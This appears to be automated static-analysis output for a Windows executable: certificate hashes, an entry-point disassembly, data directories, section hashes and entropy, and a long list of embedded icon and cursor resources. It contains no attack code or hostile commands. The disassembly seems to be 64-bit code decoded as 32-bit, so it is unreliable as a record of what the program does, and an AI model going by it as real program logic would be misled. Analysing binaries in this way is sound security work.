                          Thumbprint SHA-1:3154B78334E2E397068DDC6DADC813A4D4E89F3E
                          Thumbprint SHA-256:EA87869BD3D0A68F60BAE0D2E802220BD11FC1DB457C02996EDD05C7BBE2CE10
                          Serial:00DC630D1C4604E36B1C380E74B8EB2358
                          Instruction
                          push ebp
                          dec eax
                          mov ebp, esp
                          dec eax
                          lea esp, dword ptr [esp-20h]
                          mov byte ptr [005E3E90h], 00000000h
                          dec esp
                          lea eax, dword ptr [009C5F49h]
                          dec eax
                          lea edx, dword ptr [009C5F4Ah]
                          dec eax
                          lea ecx, dword ptr [005E2FABh]
                          call 00007F0B54BB63CBh
                          call 00007F0B54BB63D6h
                          dec eax
                          lea ecx, dword ptr [005E2F3Ah]
                          call 00007F0B54BCC47Ah
                          nop
                          dec eax
                          lea esp, dword ptr [ebp+00h]
                          pop ebp
                          ret
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          push ebp
                          dec eax
                          mov ebp, esp
                          dec eax
                          lea esp, dword ptr [esp-20h]
                          call 00007F0B54BC5CB7h
                          mov byte ptr [005E4AFBh], 00000001h
                          dec eax
                          mov eax, dword ptr [005E4AC4h]
                          mov byte ptr [eax+00000258h], 00000001h
                          dec eax
                          mov ecx, dword ptr [005E4AB6h]
                          dec eax
                          mov eax, dword ptr [005E4AAFh]
                          dec eax
                          mov eax, dword ptr [eax]
                          call dword ptr [eax+000001E8h]
                          dec esp
                          lea eax, dword ptr [009AC95Fh]
                          dec eax
                          mov ecx, dword ptr [005E4A98h]
                          dec eax
                          lea edx, dword ptr [0066F929h]
                          call 00007F0B54BE2C71h
                          dec esp
                          lea eax, dword ptr [009ACBD5h]
                          dec eax
                          mov ecx, dword ptr [005E4A7Eh]
                          dec eax
                          lea edx, dword ptr [0067D8A7h]
                          call 00007F0B54BE2C57h
                          dec esp
                          lea eax, dword ptr [009ACABBh]
                          dec eax
                          mov ecx, dword ptr [00000000h]
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x9ca0000xf0.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x9cf0000x7b4052.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x94f0000x5d99c.pdata
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x1162e000x938.rsrc
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x5e60700x28.data
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x9cb1380x1048.idata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x5e48900x5e4a0015048f99246b3103cf1a094812c6be60unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .data0x5e60000x7f6240x7f80004dc067aca24148b6badf21f4880b783False0.5578182444852942DOS executable (block device driver)6.338975821321393IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rdata0x6660000x2e82dc0x2e8400703251b2fb8e919187eb6893f203c3faunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .pdata0x94f0000x5d99c0x5da00c7be05cc7639db76c46a146456b44e20False0.5105374874833111data6.46474710165666IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .bss0x9ad0000x1b4580x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .CRT0x9c90000x180x200caaccb6f88100938b328d46db354419fFalse0.03515625data0.06116285224115448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .idata0x9ca0000x44a20x4600e20ecdd239f673b5f32d56733490c7caFalse0.25100446428571427data4.348206593435725IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          .rsrc0x9cf0000x7b40520x7b42004b4b12e5b75ec3edbf08409a9b5b1310unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          HQTO0x9d6a800x6f6252PNG image data, 2992 x 2913, 8-bit/color RGB, non-interlacedEnglishUnited States0.9997720718383789
                          RT_CURSOR0x10cccd40x134data0.12012987012987013
                          RT_CURSOR0x10cce080x134data0.2305194805194805
                          RT_CURSOR0x10ccf3c0x134data0.4935064935064935
                          RT_CURSOR0x10cd0700x334data0.24634146341463414
                          RT_CURSOR0x10cd3a40x434data0.24814126394052044
                          RT_CURSOR0x10cd7d80x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"0.5
                          RT_CURSOR0x10cd90c0x334data0.24634146341463414
                          RT_CURSOR0x10cdc400x434Targa image data 128 x 65536 x 1 +64 "\001"0.24349442379182157
                          RT_CURSOR0x10ce0740x134data0.36688311688311687
                          RT_CURSOR0x10ce1a80x334data0.2146341463414634
                          RT_CURSOR0x10ce4dc0x434data0.18680297397769516
                          RT_CURSOR0x10ce9100x134Targa image data 64 x 65536 x 1 +32 "\001"0.36688311688311687
                          RT_CURSOR0x10cea440x334Targa image data - RLE 96 x 65536 x 1 +48 "\001"0.20609756097560974
                          RT_CURSOR0x10ced780x434Targa image data - Color 128 x 65536 x 1 +64 "\001"0.17657992565055763
                          RT_CURSOR0x10cf1ac0x134data0.5844155844155844
                          RT_CURSOR0x10cf2e00x334data0.3
                          RT_CURSOR0x10cf6140x434data0.2983271375464684
                          RT_CURSOR0x10cfa480x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"0.42857142857142855
                          RT_CURSOR0x10cfb7c0x334data0.2280487804878049
                          RT_CURSOR0x10cfeb00x434Targa image data 128 x 65536 x 1 +64 "\001"0.23513011152416358
                          RT_CURSOR0x10d02e40x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"0.5
                          RT_CURSOR0x10d04180x334data0.24634146341463414
                          RT_CURSOR0x10d074c0x434Targa image data 128 x 65536 x 1 +64 "\001"0.24349442379182157
                          RT_CURSOR0x10d0b800x134data0.2662337662337662
                          RT_CURSOR0x10d0cb40x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38311688311688313
                          RT_CURSOR0x10d0de80x134data0.3538961038961039
                          RT_CURSOR0x10d0f1c0x134dataSerbianItaly0.34415584415584416
                          RT_BITMAP0x10d10500x908Device independent bitmap graphic, 50 x 24 x 8, image size 1248PortugueseBrazil0.28027681660899656
                          RT_ICON0x10d19580x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512PortugueseBrazil0.5013440860215054
                          RT_ICON0x10d1c400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 11520.621841155234657
                          RT_DIALOG0x10d24e80x32data0.76
                          RT_RCDATA0x10d251c0x111PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0
                          RT_RCDATA0x10d26300x11fPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced0.9930313588850174
                          RT_RCDATA0x10d27500x139PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced0.9904153354632588
                          RT_RCDATA0x10d288c0x163PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0225352112676056
                          RT_RCDATA0x10d29f00x1dcPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.023109243697479
                          RT_RCDATA0x10d2bcc0x274PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.017515923566879
                          RT_RCDATA0x10d2e400x1efPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0222222222222221
                          RT_RCDATA0x10d30300x2eaPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0147453083109919
                          RT_RCDATA0x10d331c0x377PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.012401352874859
                          RT_RCDATA0x10d36940x175PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0
                          RT_RCDATA0x10d380c0x173PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0080862533692723
                          RT_RCDATA0x10d39800x1f2PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0140562248995983
                          RT_RCDATA0x10d3b740x194PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0222772277227723
                          RT_RCDATA0x10d3d080x1d4PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0235042735042734
                          RT_RCDATA0x10d3edc0x22cPNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0197841726618706
                          RT_RCDATA0x10d41080x2c8PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0154494382022472
                          RT_RCDATA0x10d43d00x41ePNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0104364326375712
                          RT_RCDATA0x10d47f00x528PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0083333333333333
                          RT_RCDATA0x10d4d180x139PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0191693290734825
                          RT_RCDATA0x10d4e540x142PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0279503105590062
                          RT_RCDATA0x10d4f980x1a1PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.026378896882494
                          RT_RCDATA0x10d513c0x167PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0222841225626742
                          RT_RCDATA0x10d52a40x1b9PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.018140589569161
                          RT_RCDATA0x10d54600x1ddPNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0230607966457024
                          RT_RCDATA0x10d56400x132PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.022875816993464
                          RT_RCDATA0x10d57740x180PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0286458333333333
                          RT_RCDATA0x10d58f40x17cPNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0289473684210526
                          RT_RCDATA0x10d5a700x139PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0191693290734825
                          RT_RCDATA0x10d5bac0x142PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0279503105590062
                          RT_RCDATA0x10d5cf00x1a1PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.026378896882494
                          RT_RCDATA0x10d5e940x1f3PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0220440881763526
                          RT_RCDATA0x10d60880x2f7PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0144927536231885
                          RT_RCDATA0x10d63800x3c0PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0114583333333333
                          RT_RCDATA0x10d67400x288PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0169753086419753
                          RT_RCDATA0x10d69c80x41fPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0104265402843602
                          RT_RCDATA0x10d6de80x58bPNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0077519379844961
                          RT_RCDATA0x10d73740x2a1PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0163447251114412
                          RT_RCDATA0x10d76180x40aPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0106382978723405
                          RT_RCDATA0x10d7a240x58ePNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0077355836849509
                          RT_RCDATA0x10d7fb40x29fPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0163934426229508
                          RT_RCDATA0x10d82540x3f8PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0108267716535433
                          RT_RCDATA0x10d864c0x587PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.007773851590106
                          RT_RCDATA0x10d8bd40x12cPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0166666666666666
                          RT_RCDATA0x10d8d000x177PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0293333333333334
                          RT_RCDATA0x10d8e780x195PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0271604938271606
                          RT_RCDATA0x10d90100x228PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.019927536231884
                          RT_RCDATA0x10d92380x326PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0136476426799008
                          RT_RCDATA0x10d95600x3c6PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0113871635610765
                          RT_RCDATA0x10d99280x12cPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0166666666666666
                          RT_RCDATA0x10d9a540x177PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0293333333333334
                          RT_RCDATA0x10d9bcc0x195PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0271604938271606
                          RT_RCDATA0x10d9d640x31bPNG image data, 16 x 16, 8-bit/color RGBA, interlaced1.0138364779874214
                          RT_RCDATA0x10da0800x4c8PNG image data, 24 x 24, 8-bit/color RGBA, interlaced1.0089869281045751
                          RT_RCDATA0x10da5480x70dPNG image data, 32 x 32, 8-bit/color RGBA, interlaced1.0060941828254848
                          RT_RCDATA0x10dac580xe9PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced0.9828326180257511
                          RT_RCDATA0x10dad440x10dPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced0.9814126394052045
                          RT_RCDATA0x10dae540x11cPNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0035211267605635
                          RT_RCDATA0x10daf700x258PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0183333333333333
                          RT_RCDATA0x10db1c80x320PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.01375
                          RT_RCDATA0x10db4e80x3f6PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0108481262327416
                          RT_RCDATA0x10db8e00x176PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0133689839572193
                          RT_RCDATA0x10dba580x1a2PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.014354066985646
                          RT_RCDATA0x10dbbfc0x1caPNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0240174672489082
                          RT_RCDATA0x10dbdc80x171PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.018970189701897
                          RT_RCDATA0x10dbf3c0x1a3PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0214797136038185
                          RT_RCDATA0x10dc0e00x1c4PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0243362831858407
                          RT_RCDATA0x10dc2a40x193PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.022332506203474
                          RT_RCDATA0x10dc4380x1b2PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0069124423963134
                          RT_RCDATA0x10dc5ec0x1e0PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced0.9979166666666667
                          RT_RCDATA0x10dc7cc0x151PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0089020771513353
                          RT_RCDATA0x10dc9200x174PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0080645161290323
                          RT_RCDATA0x10dca940x192PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0124378109452736
                          RT_RCDATA0x10dcc280x1b5PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0251716247139588
                          RT_RCDATA0x10dcde00x27dPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0172684458398744
                          RT_RCDATA0x10dd0600x3aePNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0116772823779194
                          RT_RCDATA0x10dd4100x14cPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0060240963855422
                          RT_RCDATA0x10dd55c0x170PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0054347826086956
                          RT_RCDATA0x10dd6cc0x18fPNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0275689223057645
                          RT_RCDATA0x10dd85c0x37dPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0123180291153415
                          RT_RCDATA0x10ddbdc0x554PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0080645161290323
                          RT_RCDATA0x10de1300x632PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0069356872635562
                          RT_RCDATA0x10de7640x15bPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0172910662824208
                          RT_RCDATA0x10de8c00x19cPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0218446601941749
                          RT_RCDATA0x10dea5c0x216PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0205992509363295
                          RT_RCDATA0x10dec740x717PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.006060606060606
                          RT_RCDATA0x10df38c0xc40PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0035076530612246
                          RT_RCDATA0x10dffcc0x1170PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced1.002464157706093
                          RT_RCDATA0x10e113c0x625PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.006993006993007
                          RT_RCDATA0x10e17640xa3bPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0042000763650247
                          RT_RCDATA0x10e21a00xecfPNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced1.002901609074123
                          RT_RCDATA0x10e30700x63ePNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.006883604505632
                          RT_RCDATA0x10e36b00xa70PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0041167664670658
                          RT_RCDATA0x10e41200xf48PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced1.0028118609406953
                          RT_RCDATA0x10e50680x5d7PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0073578595317725
                          RT_RCDATA0x10e56400x938PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0046610169491526
                          RT_RCDATA0x10e5f780xd2ePNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced1.0032602252519265
                          RT_RCDATA0x10e6ca80x38ePNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.012087912087912
                          RT_RCDATA0x10e70380x561PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0079883805374001
                          RT_RCDATA0x10e759c0x7a1PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced1.0056323604710702
                          RT_RCDATA0x10e7d400x237PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0194003527336861
                          RT_RCDATA0x10e7f780x36bPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0125714285714287
                          RT_RCDATA0x10e82e40x475PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0096406660823838
                          RT_RCDATA0x10e875c0x223PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0201096892138939
                          RT_RCDATA0x10e89800x314PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.013959390862944
                          RT_RCDATA0x10e8c940x3a4PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.011802575107296
                          RT_RCDATA0x10e90380x1ffPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0215264187866928
                          RT_RCDATA0x10e92380x308PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0141752577319587
                          RT_RCDATA0x10e95400x438PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.010185185185185
                          RT_RCDATA0x10e99780x1ecPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0223577235772359
                          RT_RCDATA0x10e9b640x2b2PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0159420289855072
                          RT_RCDATA0x10e9e180x3a9PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0117395944503735
                          RT_RCDATA0x10ea1c40x225PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0200364298724955
                          RT_RCDATA0x10ea3ec0x2a1PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0163447251114412
                          RT_RCDATA0x10ea6900x3ddPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0111223458038423
                          RT_RCDATA0x10eaa700x4cfPNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0089358245329
                          RT_RCDATA0x10eaf400x2bfPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0156472261735419
                          RT_RCDATA0x10eb2000x3eaPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0109780439121756
                          RT_RCDATA0x10eb5ec0x4d5PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0088924818108327
                          RT_RCDATA0x10ebac40x2cbPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0153846153846153
                          RT_RCDATA0x10ebd900x306PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0142118863049097
                          RT_RCDATA0x10ec0980x16ePNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.030054644808743
                          RT_RCDATA0x10ec2080x1fdPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0216110019646365
                          RT_RCDATA0x10ec4080x2acPNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0160818713450293
                          RT_RCDATA0x10ec6b40x21aPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.020446096654275
                          RT_RCDATA0x10ec8d00x2f4PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0145502645502646
                          RT_RCDATA0x10ecbc40x420PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0104166666666667
                          RT_RCDATA0x10ecfe40x230PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.019642857142857
                          RT_RCDATA0x10ed2140x2a3PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0162962962962963
                          RT_RCDATA0x10ed4b80x3bdPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0114942528735633
                          RT_RCDATA0x10ed8780x547PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.008142116950407
                          RT_RCDATA0x10eddc00x2aePNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0160349854227406
                          RT_RCDATA0x10ee0700x3ddPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0111223458038423
                          RT_RCDATA0x10ee4500x55aPNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.008029197080292
                          RT_RCDATA0x10ee9ac0x2ffPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.014341590612777
                          RT_RCDATA0x10eecac0x3efPNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0109235352532273
                          RT_RCDATA0x10ef09c0xd7PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced0.986046511627907
                          RT_RCDATA0x10ef1740x11bPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced0.9964664310954063
                          RT_RCDATA0x10ef2900xf9PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0
                          RT_RCDATA0x10ef38c0x1c4PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0243362831858407
                          RT_RCDATA0x10ef5500x2e4PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0148648648648648
                          RT_RCDATA0x10ef8340x367PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0126291618828933
                          RT_RCDATA0x10efb9c0x1c8PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0241228070175439
                          RT_RCDATA0x10efd640x2abPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0161054172767203
                          RT_RCDATA0x10f00100x2efPNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.014647137150466
                          RT_RCDATA0x10f03000x26dPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0177133655394526
                          RT_RCDATA0x10f05700x3e6PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0110220440881763
                          RT_RCDATA0x10f09580x5a0PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.007638888888889
                          RT_RCDATA0x10f0ef80x2fbPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0144167758846658
                          RT_RCDATA0x10f11f40x52bPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0083144368858654
                          RT_RCDATA0x10f17200x6c8PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.006336405529954
                          RT_RCDATA0x10f1de80x236PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.019434628975265
                          RT_RCDATA0x10f20200x347PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0131108462455305
                          RT_RCDATA0x10f23680x3f9PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0108161258603736
                          RT_RCDATA0x10f27640x148PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0152439024390243
                          RT_RCDATA0x10f28ac0x174PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0134408602150538
                          RT_RCDATA0x10f2a200x192PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0199004975124377
                          RT_RCDATA0x10f2bb40x135PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced0.9935275080906149
                          RT_RCDATA0x10f2cec0x1c8PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.019736842105263
                          RT_RCDATA0x10f2eb40x259PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0183028286189684
                          RT_RCDATA0x10f31100x2f6PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0145118733509235
                          RT_RCDATA0x10f34080x477PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0096237970253719
                          RT_RCDATA0x10f38800x5d5PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0073677160080374
                          RT_RCDATA0x10f3e580x155PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0117302052785924
                          RT_RCDATA0x10f3fb00x1b2PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0253456221198156
                          RT_RCDATA0x10f41640x20ePNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.020912547528517
                          RT_RCDATA0x10f43740xf8PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0
                          RT_RCDATA0x10f446c0x131PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0065573770491802
                          RT_RCDATA0x10f45a00x139PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0095846645367412
                          RT_RCDATA0x10f46dc0x190PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0225
                          RT_RCDATA0x10f486c0x25ePNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.018151815181518
                          RT_RCDATA0x10f4acc0x340PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0132211538461537
                          RT_RCDATA0x10f4e0c0x2e0PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.014945652173913
                          RT_RCDATA0x10f50ec0x453PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.009936766034327
                          RT_RCDATA0x10f55400x5c0PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0074728260869565
                          RT_RCDATA0x10f5b000xa6PNG image data, 9 x 9, 8-bit/color RGBA, non-interlaced0.963855421686747
                          RT_RCDATA0x10f5ba80xc6PNG image data, 13 x 13, 8-bit/color RGBA, non-interlaced0.9696969696969697
                          RT_RCDATA0x10f5c700xcbPNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced0.9802955665024631
                          RT_RCDATA0x10f5d3c0x16fPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0190735694822888
                          RT_RCDATA0x10f5eac0x194PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0198019801980198
                          RT_RCDATA0x10f60400x243PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0189982728842832
                          RT_RCDATA0x10f62840x108PNG image data, 8 x 8, 8-bit/color RGBA, non-interlaced1.0
                          RT_RCDATA0x10f638c0x162PNG image data, 12 x 12, 8-bit/color RGBA, non-interlaced1.0141242937853108
                          RT_RCDATA0x10f64f00x17dPNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.020997375328084
                          RT_RCDATA0x10f66700x1b1PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0184757505773672
                          RT_RCDATA0x10f68240x23fPNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0191304347826087
